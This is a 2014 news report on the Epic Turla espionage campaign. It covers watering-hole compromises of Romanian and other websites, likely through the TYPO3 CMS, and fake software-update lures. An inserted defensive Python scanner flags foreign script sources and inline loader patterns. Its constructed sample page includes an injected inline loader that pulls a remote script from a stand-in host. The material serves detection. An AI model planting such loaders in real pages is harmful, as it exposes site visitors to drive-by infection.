Websites were probably compromised due to vulnerability in the CMS platform

Aug 8, 2014 18:31 GMT

Security experts analyzing a cyber-espionage campaign found that the largest number of websites compromised to distribute the Turla Trojan were administered by the Romanian Government.

Named by Kaspersky researchers “Epic Turla,” the espionage campaign that relies on the Turla toolkit (also known as Snake or Uroburos) distributes the spying component through spear-phishing and watering hole attacks.

It seems that in the case of the latter, in a per-country classification, Romania tops the list with 17 websites injected with the malware-serving code. This is by far the largest number of infections; the next most affected country, Switzerland, recorded roughly half that amount, nine.

The Kaspersky report says that “distribution is obviously not random, and it reflects some of the interests of the attackers.” As far as Romania is concerned, many of the compromised sites are in the Mures region.

Costin Raiu, head of the Global Research and Analysis Team at Kaspersky, told us via Twitter that other infected websites belong to entities in the North-West part of the country, but there is no information on why these were of interest to the attackers.

The security company said that one method of infecting the websites could be abuse of the TYPO3 CMS (content management system), which seems to be the most prevalent platform among them; a compromised site loads a remote JavaScript file into the visitor's browser, which then redirects to an exploitation PHP script.
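From the defender's side, the injection described above leaves a visible trace in the site's own HTML: a script reference, or an inline loader, pointing at a host the site does not own. The following scanner is an added example, not code from the article or from Kaspersky; the site host, the sample page and the third-party host names are constructed for illustration, and the list of inline-loader markers is a heuristic assumption rather than anything the report specifies.

```python
"""
Inventory <script> references in a saved HTML page and flag those that load
from a host other than the site's own, plus inline scripts that build a
loader or redirect at page load.  Added example; all inputs are constructed.
"""
from html.parser import HTMLParser
from urllib.parse import urlparse


class ScriptCollector(HTMLParser):
    """Collect src attributes of <script> tags and the bodies of inline scripts."""

    def __init__(self):
        super().__init__()
        self.external = []      # values of src= on <script> tags
        self.inline = []        # full text of each inline <script>
        self._buf = None        # accumulates chunks of the current inline script

    def handle_starttag(self, tag, attrs):
        if tag.lower() != "script":
            return
        src = dict(attrs).get("src")
        if src:
            self.external.append(src)
        else:
            self._buf = []

    def handle_data(self, data):
        if self._buf is not None:
            self._buf.append(data)

    def handle_endtag(self, tag):
        if tag.lower() == "script" and self._buf is not None:
            body = "".join(self._buf).strip()
            if body:
                self.inline.append(body)
            self._buf = None


def foreign_scripts(html, site_host):
    """Return src values whose host is neither site_host nor one of its subdomains.

    Relative paths (no host) are served by the site itself and are skipped;
    protocol-relative "//host/x.js" and absolute URLs both carry a host.
    """
    p = ScriptCollector()
    p.feed(html)
    site_host = site_host.lower()
    flagged = []
    for src in p.external:
        host = urlparse(src.strip()).hostname   # already lower-cased by urlparse
        if host is None:
            continue
        if host == site_host or host.endswith("." + site_host):
            continue
        flagged.append(src)
    return flagged


# Heuristic markers (assumption): inline code that creates a script element
# or navigates away is what a remote-loader injection typically looks like.
LOADER_MARKERS = (
    'createElement("script")',
    "createElement('script')",
    "document.write(",
    "location.href",
    "location.replace(",
)


def suspicious_inline(html):
    """Return inline script bodies containing any loader/redirect marker."""
    p = ScriptCollector()
    p.feed(html)
    return [s for s in p.inline if any(m in s for m in LOADER_MARKERS)]


# Constructed sample page: one first-party script, one first-party CDN
# subdomain, one injected third-party script, one injected inline loader.
SAMPLE_PAGE = """<html><head>
<script src="/typo3temp/assets/site.js"></script>
<script src="https://cdn.example-site.ro/lib.js"></script>
<script src="//stats.example-third-party.net/t.js"></script>
<script>var s=document.createElement('script');
s.src='http://stats.example-third-party.net/r.php';document.head.appendChild(s);</script>
</head><body>Hello</body></html>"""


if __name__ == "__main__":
    for src in foreign_scripts(SAMPLE_PAGE, "example-site.ro"):
        print("foreign script:", src)
    for body in suspicious_inline(SAMPLE_PAGE):
        print("inline loader :", body[:60], "...")
```

Run it against pages saved from the web root (or a crawl of the live site) and compare the output with the set of third-party hosts the site is known to use; anything outside that allowlist is worth a look in the CMS templates and the web server's change history.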

Vulnerabilities in Java, Adobe Flash Player and Internet Explorer have also been seen by security researchers to be leveraged during the campaign.

Another technique to infect the victim’s computer is tricking the user into executing a fake update for Adobe Flash. Researchers also have evidence that the threat actors tried to push a fake Microsoft Security Essentials application to users. This social engineering tactic has been observed to be combined with the watering hole attack.

The large number of infected websites in Romania does not necessarily mean that most of the victims are also from this country. The statistics from Kaspersky put France at the top of the list, with infections being reported for 25 IP addresses. Next in line is the United States with 24 infections, while Iran falls in third place, with a total of 22 infections.

In this ranking, Romania is in seventh place, with 15 compromised addresses.

Epic Turla is a sophisticated cyber-espionage operation that has recently been analyzed by researchers from multiple security entities, such as Kaspersky, Symantec, and CrySyS Lab in Budapest.

Other security companies, such as G Data and BAE Systems, have examined the operation in the past as well.

The operation is far from new: the first sample was recorded four years ago, in 2010. Despite efforts to disrupt its activity, the Turla operators have managed to make the espionage toolkit more sophisticated and have continued their activity.

[Image: Per-country top of compromised websites for watering hole attack]
[Image: Most affected countries by IP address]